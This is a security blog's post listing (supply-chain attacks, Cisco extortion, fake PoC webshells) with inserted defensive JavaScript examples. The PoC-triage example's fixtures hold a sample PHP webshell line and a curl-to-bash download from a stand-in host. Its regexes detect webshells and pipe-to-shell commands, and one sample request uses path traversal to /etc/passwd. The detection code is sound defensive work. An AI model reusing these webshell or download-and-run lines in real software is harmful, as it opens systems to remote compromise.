Cisco Paid. The Worst Week in Cybersecurity History Just Got a Final Chapter.
Cisco has been removed from ShinyHunters' dark web leak site. The listing that threatened to dump 3 million Salesforce records, 300 private GitHub repositories, AI product source code, and FBI/IRS/NASA customer data — gone. As of this morning, every other victim is still listed. Cisco is not. In the ransomware world, removal from a leak site means one thing: the victim paid. Cisco has not confirmed payment. They won't. But the $57 billion company that sells firewalls, intrusi
Patrick Duggan
Apr 3 · 4 min read


The Chain Reaches Government. TeamPCP + ShinyHunters Hit Cisco and the European Commission Through Aqua's Security Scanner.
On April 1, we published "One Actor, Three Supply Chains" — documenting how TeamPCP chained Trivy → LiteLLM → Telnyx, each compromise funding the next. We said the chain doesn't stop when the vendor publishes a blog post. It stops when the credentials expire. The credentials haven't expired. Today we learned the chain reaches Cisco. And the European Commission. And potentially the FBI, IRS, and NASA. The Full Chain Aqua Security's Trivy (security scanner) ↓ TeamPCP poisoned 7
Patrick Duggan
Apr 3 · 4 min read


Your GPU Is Your Attack Surface. Rowhammer Just Proved It.
Two research teams dropped papers yesterday showing that NVIDIA GPUs are vulnerable to Rowhammer attacks. Not theoretical. Not in a lab. Hundreds to thousands of bit flips on production hardware — RTX 3060, RTX A6000 — giving the attacker full control of the host machine through the GPU's memory. The GPU that trains your AI model. The GPU that renders your cloud workload. The GPU that powers the inference engine your customers depend on. It's an attack surface. It always was.
Patrick Duggan
Apr 3 · 5 min read


We're Two People. We Exceed CMMC Level 2 Requirements That 500-Person Defense Contractors Struggle to Meet.
CMMC Level 2 requires 110 security controls from NIST SP 800-171. It's the standard every defense contractor must meet to handle Controlled Unclassified Information. Companies spend $34,000 to $112,000 on assessments. They hire compliance teams. They buy GRC platforms. They struggle. We're two people in Minneapolis running a threat intelligence platform on $600 a month. We've implemented 78 of 110 controls. Not because we were trying to pass an audit. Because we were building
Patrick Duggan
Apr 3 · 5 min read


Cisco Is Having the Worst Week in Cybersecurity History. Here's the Scoreboard.
It's Thursday, April 3. ShinyHunters' deadline to dump Cisco's data expires today. This is the fifth simultaneous crisis hitting Cisco in seven days. Nobody's had a week this bad. The Scoreboard # Crisis Severity Status 1 CVE-2026-20131 — FMC zero-day (CVSS 10.0) Maximum Exploited 36 days before disclosure. Interlock ransomware used it to hit hospitals and Saint Paul, MN. Amazon found it, not Cisco. 2 ShinyHunters extortion — 3M+ Salesforce records Critical Three breach vecto
Patrick Duggan
Apr 3 · 5 min read


The FBI's Wiretap Network Got Hacked. They Called It a 'Major Incident.' That Almost Never Happens.
The FBI just told Congress that the breach of its wiretap and surveillance network qualifies as a "major incident." The former deputy assistant director of the FBI's cyber division says she can't recall the bureau making that determination about its own systems since at least 2020. The affected system manages electronic surveillance — wiretaps, pen registers, trap and trace data, and personally identifiable information on subjects of FBI investigations. The people the FBI is
Patrick Duggan
Apr 2 · 4 min read


LinkedIn Scans Your Browser for 6,222 Chrome Extensions Without Asking. Microsoft Owns LinkedIn.
Every time you visit LinkedIn, a 2.7 megabyte JavaScript file loads in your browser. Inside it: 6,222 hardcoded Chrome extension IDs. The code probes each one — sending fetch() requests to chrome-extension:// URLs to detect what you have installed. The results go to LinkedIn's telemetry servers. You were never asked. LinkedIn's privacy policy doesn't mention it. And a LinkedIn Senior Manager admitted under sworn affidavit that the company has "extension detection mechanisms"
Patrick Duggan
Apr 2 · 4 min read
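The extension-detection pattern described above can be checked for in any bundle you download. The following is an added example, not LinkedIn's code and not the author's: it pulls hardcoded Chrome extension IDs out of JavaScript text (Chrome IDs are 32 characters drawn only from the letters a through p, the key hash written in a..p instead of 0..f) and counts references to `chrome-extension://`. The sample bundle, the synthetic IDs, the `minIds` threshold and the function names are all constructed for this example.

```javascript
// Added example, not LinkedIn's code: audit a JavaScript bundle for hardcoded
// Chrome extension IDs and for code that builds chrome-extension:// URLs.
// Chrome extension IDs are 32 characters drawn only from the letters a-p
// (the key hash encoded with a..p in place of 0..f), so they stand out even
// in minified code. The sample bundle below is constructed for this example.

const EXT_ID_RE = /\b[a-p]{32}\b/g;
const PROBE_RE = /chrome-extension:\/\//g;

// Pull every distinct 32-char a-p token out of the bundle text.
function extractExtensionIds(bundleText) {
  const ids = new Set();
  for (const m of bundleText.matchAll(EXT_ID_RE)) ids.add(m[0]);
  return [...ids].sort();
}

// A bundle that both embeds many extension IDs and builds chrome-extension://
// URLs is the enumeration pattern; `minIds` is an arbitrary threshold (assumption).
function auditBundle(bundleText, minIds = 10) {
  const ids = extractExtensionIds(bundleText);
  const probeRefs = (bundleText.match(PROBE_RE) || []).length;
  return {
    extensionIds: ids.length,
    probeRefs,
    looksLikeEnumeration: ids.length >= minIds && probeRefs > 0,
  };
}

// Synthetic IDs: 32 letters from a..p, distinct per seed. Not real extensions.
function syntheticId(seed) {
  let s = '';
  for (let i = 0; i < 32; i++) s += String.fromCharCode(97 + ((i * 7 + seed) % 16));
  return s;
}

const SAMPLE_IDS = Array.from({ length: 12 }, (_, n) => syntheticId(n));

// Constructed minified snippet of the shape the post describes: loop over IDs,
// fetch a resource path under each chrome-extension:// origin, and report which
// fetches resolve. A hex hash is included to show it does not match the ID regex.
const SAMPLE_BUNDLE =
  'var e=' + JSON.stringify(SAMPLE_IDS) + ',r=["icon.png","manifest.json"],t=[];' +
  'e.forEach(function(i){r.forEach(function(p){fetch("chrome-extension://"+i+"/"+p)' +
  '.then(function(){t.push(i)}).catch(function(){})})});' +
  'navigator.sendBeacon("/track",JSON.stringify({ext:t,h:"0123456789abcdef0123456789abcdef"}));';

console.log(auditBundle(SAMPLE_BUNDLE));
```

To run it against a real page, read the bundle with `fs.readFileSync` and pass the text to `auditBundle`. The probe only works against resources an extension exposes; on the defending side, a Manifest V3 extension can limit this by giving each `web_accessible_resources` entry a narrow `matches` list and setting `use_dynamic_url: true`, so a page on an unlisted origin cannot resolve the resource URL at all.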


IP Reputation Is Dead. GreyNoise Just Proved What Our Behavioral Engine Has Known Since December.
GreyNoise analyzed 4 billion malicious sessions over three months. The finding: 78% of them evaded IP reputation checks entirely. Not because the attackers were sophisticated. Not because the blocklists were outdated. Because the traffic came from your neighbor's WiFi. The Residential Proxy Problem 39% of the malicious sessions in GreyNoise's study originated from home networks. Real residential IP addresses. Real ISPs. Addresses that have never been on a blocklist because th
Patrick Duggan
Apr 2 · 4 min read
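The point of the residential-proxy finding is that a source-address verdict and a behaviour verdict can disagree in both directions. The following is an added example, not GreyNoise's study code and not the author's behavioral engine: it runs a reputation lookup and a small behaviour scorer over constructed sessions. The addresses (RFC 5737 test ranges), the session records, the path patterns, the weights and the `threshold` are all assumptions made for illustration.

```javascript
// Added example, not GreyNoise's code or the author's engine: classify web
// sessions by behaviour instead of by source address. Addresses, sessions,
// path patterns and weights are constructed for illustration.

const BLOCKLIST = new Set(['198.51.100.7']); // stands in for a reputation feed

function ipReputationVerdict(session) {
  return BLOCKLIST.has(session.ip) ? 'block' : 'allow';
}

// Request shapes that a scanner or exploit kit sends to a site it has never
// used; this list is a starter set, not a signature database.
const EXPLOIT_PATHS = [/\.\.\//, /\/cgi-bin\//, /\/\.env$/, /\/wp-login\.php$/, /\/actuator\//];
const STATIC_ASSET = /\.(js|css|png|jpg|svg|woff2?)$/;

function behavioralScore(session) {
  const reqs = session.requests;
  const reasons = [];
  let score = 0;

  const exploitHits = reqs.filter(r => EXPLOIT_PATHS.some(re => re.test(r.path))).length;
  if (exploitHits > 0) { score += 3 * exploitHits; reasons.push(`${exploitHits} exploit-shaped paths`); }

  const notFound = reqs.filter(r => r.status === 404).length;
  if (reqs.length >= 5 && notFound / reqs.length >= 0.5) { score += 2; reasons.push(`${notFound}/${reqs.length} 404s`); }

  const loadsAssets = reqs.some(r => STATIC_ASSET.test(r.path));
  if (reqs.length >= 5 && !loadsAssets) { score += 1; reasons.push('no static assets'); }

  // Burst timing: more than 2 requests per second over the session.
  const span = Math.max(...reqs.map(r => r.t)) - Math.min(...reqs.map(r => r.t));
  if (span > 0 && reqs.length / span > 2) { score += 2; reasons.push('burst rate'); }

  return { score, reasons };
}

function classify(session, threshold = 4) {
  const { score, reasons } = behavioralScore(session);
  return {
    ip: session.ip,
    reputation: ipReputationVerdict(session),
    behavior: score >= threshold ? 'block' : 'allow',
    reasons,
  };
}

// Constructed sessions. `t` is seconds since the session started.
const req = (path, status, t) => ({ path, status, t });
const SESSIONS = [
  { // residential address that no feed lists, behaving like a scanner
    ip: '203.0.113.44',
    requests: [
      req('/.env', 404, 0.0), req('/wp-login.php', 404, 0.2), req('/cgi-bin/test', 404, 0.4),
      req('/../../etc/passwd', 404, 0.6), req('/actuator/health', 404, 0.8), req('/admin', 404, 1.0),
    ],
  },
  { // neighbour in the same ISP range, normal browsing
    ip: '203.0.113.45',
    requests: [
      req('/', 200, 0), req('/static/app.js', 200, 1), req('/static/app.css', 200, 1.2),
      req('/api/me', 200, 5), req('/logo.png', 200, 30),
    ],
  },
  { // listed address, single harmless request
    ip: '198.51.100.7',
    requests: [req('/', 200, 0)],
  },
];

for (const s of SESSIONS) console.log(classify(s));
```

The first session is the case in the study: a home address with no reputation history, which the feed allows and the behaviour scorer blocks. The third is the opposite mismatch, a listed address doing nothing, which is why the two verdicts belong side by side in the log rather than collapsed into one.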


We Checked GitHub for Exploit Code Targeting the IRGC's Hit List. Nobody Else Is Looking.
Yesterday the IRGC named 18 American companies as military targets. Today we went hunting on GitHub for the exploit code that's already being staged against them. We found webshells disguised as security research. Full exploitation toolkits published the day before CISA deadlines. Java GUI "exploit tools" committed with debug logs. And nobody paying attention. This is the wasteland. The space between a CVE disclosure and a patch deployment where attackers stage their tools in
Patrick Duggan
Apr 2 · 4 min read


Iran Just Named 18 American Companies as Military Targets. We Have Files on Six of Them.
Yesterday at 8 PM Tehran time, the Islamic Revolutionary Guard Corps published a list of 18 American technology companies it considers "legitimate military targets." For every assassination of an Iranian leader, an American company will be destroyed. Employees were told to leave their workplaces immediately. The list: Apple. Google. Meta. Microsoft. Nvidia. Intel. Cisco. HP. Dell. Oracle. IBM. Palantir. Tesla. Boeing. General Electric. JPMorgan Chase. Spire Solutions. G42. We
Patrick Duggan
Apr 2 · 5 min read


Hasbro Got Hacked. Their AI Art Pipeline Was Visible From a DNS Query.
Hasbro filed an SEC disclosure today confirming a cyberattack detected on March 28. Systems are down. Hackers may still be inside. Recovery will take "several weeks." The company that owns Transformers, Dungeons & Dragons, Magic: The Gathering, Peppa Pig, Monopoly, and My Little Pony is operating on business continuity plans. Every outlet is reporting the same thing: Hasbro got hacked, we don't know by whom, no ransomware claim yet, spokesperson won't answer questions. We loo
Patrick Duggan
Apr 1 · 4 min read


Iran Is Fighting Two Wars. We Have the IOCs for Both.
Tonight at 9 PM Eastern, the President addresses the nation on the Iran war. The Strait of Hormuz is contested. Isfahan steel plants are burning. Oil futures are swinging on every Truth Social post. Iran says the strait is "fully under their control." Trump says it'll be over in two to three weeks. That's the kinetic war. The other war — the one that hit a $22 billion medical device manufacturer, the FBI Director's personal email, and Lockheed Martin's hiring pipeline — has b
Patrick Duggan
Apr 1 · 4 min read


Dell Bought EMC for $67 Billion. Chinese Hackers Lived in RecoverPoint for Two Years.
I worked at Dell EMC. I sat in the rooms where they talked about convergence, hyper-convergence, the $67 billion acquisition that was supposed to make Dell the most complete infrastructure company on earth. VxRail, VxBlock, VMAX, Unity, Isilon, Data Domain, Avamar, RecoverPoint. The storage portfolio to end all storage portfolios. RecoverPoint was the disaster recovery product. The one that replicated your virtual machines to a secondary site so when the primary burns down, y
Patrick Duggan
Apr 1 · 5 min read


Cisco FMC Got Owned for 36 Days Before Anyone Said Anything. We Found the Fake PoC in January.
On January 14, 2026, we found a fake Cisco Firepower Management Center proof-of-concept on GitHub. It wasn't a PoC. It was a webshell disguised as one — a Pattern 38 supply chain attack targeting security researchers who test vulnerabilities for a living. We published the findings. We reported the repo. Twelve days later, on January 26, someone started exploiting the real Cisco FMC for real. Not a fake PoC. Not a webshell in a GitHub repo. A CVSS 10.0 unauthenticated remote c
Patrick Duggan
Apr 1 · 4 min read
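Both the IRGC hit-list post above and this FMC post turn on the same thing: a "PoC" repository that is really a webshell or a dropper aimed at the researcher who runs it. The following is an added example, not the author's scanner and not the contents of any repository named in either post: a static triage pass over a downloaded file before anyone executes it. The indicator list, the sample files and the `example.invalid` host are constructed assumptions, a starter set rather than a signature database.

```javascript
// Added example, not from the original posts: static triage of a downloaded
// "proof of concept" before anyone runs it. The indicator list is an
// illustrative starter set (assumption), not a complete webshell database.

const INDICATORS = [
  { id: 'php-eval-input',  re: /\beval\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b/, why: 'PHP eval of request data' },
  { id: 'php-exec-input',  re: /\b(system|shell_exec|passthru|exec)\s*\(\s*\$_(GET|POST|REQUEST)\b/, why: 'PHP command exec from request' },
  { id: 'jsp-exec-param',  re: /Runtime\.getRuntime\(\)\.exec\([^)]*getParameter/, why: 'JSP exec of request parameter' },
  { id: 'aspx-eval',       re: /\beval\s*\(\s*Request\.(Item|Form|QueryString)/i, why: 'ASP eval of request data' },
  { id: 'b64-decode-exec', re: /(base64_decode|b64decode|atob|FromBase64String)\s*\([^)]{0,40}\)[\s\S]{0,80}\b(eval|exec|system|Process)\b/, why: 'decode-then-execute' },
  { id: 'pipe-to-shell',   re: /\b(curl|wget)\b[^|\n]*\|\s*(ba)?sh\b/, why: 'remote script piped to a shell' },
  { id: 'py-exec-input',   re: /\b(exec|eval)\s*\(\s*(request|input|sys\.argv)/, why: 'Python exec of untrusted input' },
];

// Return every indicator that fires on the text, with a short excerpt.
function triagePoC(text) {
  const hits = [];
  for (const ind of INDICATORS) {
    const m = ind.re.exec(text);
    if (m) hits.push({ id: ind.id, why: ind.why, sample: m[0].slice(0, 60) });
  }
  return hits;
}

// Long base64 runs deserve a look even when no rule fires.
function longBase64Blobs(text, minLen = 200) {
  const re = new RegExp('[A-Za-z0-9+/]{' + minLen + ',}={0,2}', 'g');
  return text.match(re) || [];
}

// Constructed samples (not real repository contents).
const FAKE_POC_PHP = `<?php
// "Firepower check" helper - point this at your own lab instance
$target = $argv[1] ?? 'https://127.0.0.1';
echo "Probing $target ...\\n";
if (isset($_REQUEST['c'])) { @eval($_REQUEST['c']); }
`;

const SETUP_SH = `#!/bin/sh
# dependency setup for the PoC
pip install -r requirements.txt
curl -s https://example.invalid/setup.sh | bash
`;

const BENIGN_PY = `import requests, sys
url = sys.argv[1].rstrip('/')
r = requests.get(url + '/api/version', timeout=5, verify=False)
print(r.status_code, r.headers.get('Server'))
`;

for (const [name, text] of [['exploit.php', FAKE_POC_PHP], ['setup.sh', SETUP_SH], ['check.py', BENIGN_PY]]) {
  console.log(name, triagePoC(text), longBase64Blobs(text).length, 'long base64 blobs');
}
```

Run it over every file in the clone, not just the one named after the CVE; the post's examples put the payload in a helper or a "setup" script while the headline file looks like research. A clean result is not a clearance, only the absence of the cheap tells, so the file still goes into an isolated VM with no credentials before it runs.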


One Actor, Three Supply Chains: How TeamPCP Chained Trivy, LiteLLM, and Telnyx Into a Single Kill Chain
On March 19, someone poisoned 76 of 77 release tags in Aqua Security's Trivy-Action GitHub repository. The credential stealer ran silently inside CI/CD pipelines — the security scanner stealing secrets from the infrastructure it was trusted to protect. Five days later, malicious versions of LiteLLM appeared on PyPI. Same actor. Different package. Same technique: harvest environment variables, .env files, and shell histories from every machine that imported the package. Three
Patrick Duggan
Apr 1 · 6 min read
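A poisoned release tag only reaches pipelines that resolve that tag at run time; a workflow pinned to a 40-character commit SHA keeps running the commit it was reviewed against. The following is an added example, not Aqua's code and not the author's: it lists every `uses:` reference in a workflow file and flags the ones that are not pinned to a SHA. The sample workflow, the function names and the placeholder SHA (not a real trivy-action commit) are constructed for this example.

```javascript
// Added example (not from the original post): flag GitHub Actions `uses:`
// references that point at a mutable tag or branch instead of an immutable
// commit SHA. Sample workflow and the placeholder SHA are constructed.

const SHA_RE = /^[0-9a-f]{40}$/;
const USES_RE = /^\s*-?\s*uses:\s*["']?([^@"'\s]+)@([^"'\s#]+)/;

// Parse one workflow file's text and return every `uses:` reference found.
function parseUses(workflowText) {
  const refs = [];
  workflowText.split(/\r?\n/).forEach((line, idx) => {
    const m = USES_RE.exec(line);
    if (!m) return;
    // Local actions (./path) and docker:// references carry no git ref to pin.
    if (m[1].startsWith('./') || m[1].startsWith('docker://')) return;
    refs.push({ line: idx + 1, action: m[1], ref: m[2] });
  });
  return refs;
}

// 'pinned' means a full 40-hex SHA; anything else (v4, 0.28.0, main) can be
// re-pointed by whoever controls the upstream repository or its tags.
function auditWorkflow(workflowText) {
  return parseUses(workflowText).map(r => ({ ...r, pinned: SHA_RE.test(r.ref) }));
}

function unpinnedActions(workflowText) {
  return auditWorkflow(workflowText).filter(r => !r.pinned);
}

// Constructed sample workflow (not a real pipeline). The SHA is a placeholder.
const SAMPLE_WORKFLOW = `
name: scan
on: [push]
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Trivy (tag-pinned, mutable)
        uses: aquasecurity/trivy-action@0.28.0
        with:
          scan-type: fs
      - name: Trivy (SHA-pinned, immutable)
        uses: aquasecurity/trivy-action@0123456789abcdef0123456789abcdef01234567
      - uses: ./.github/actions/local-step
`;

for (const r of unpinnedActions(SAMPLE_WORKFLOW)) {
  console.log(`line ${r.line}: ${r.action}@${r.ref} is not pinned to a commit SHA`);
}
```

A SHA pin stops the tag-swap but not a compromise of the pinned commit's own dependencies, and it does nothing for secrets already exposed; the post's point that the chain ends when the credentials expire still holds, so rotate anything a compromised run could have read alongside the pin change.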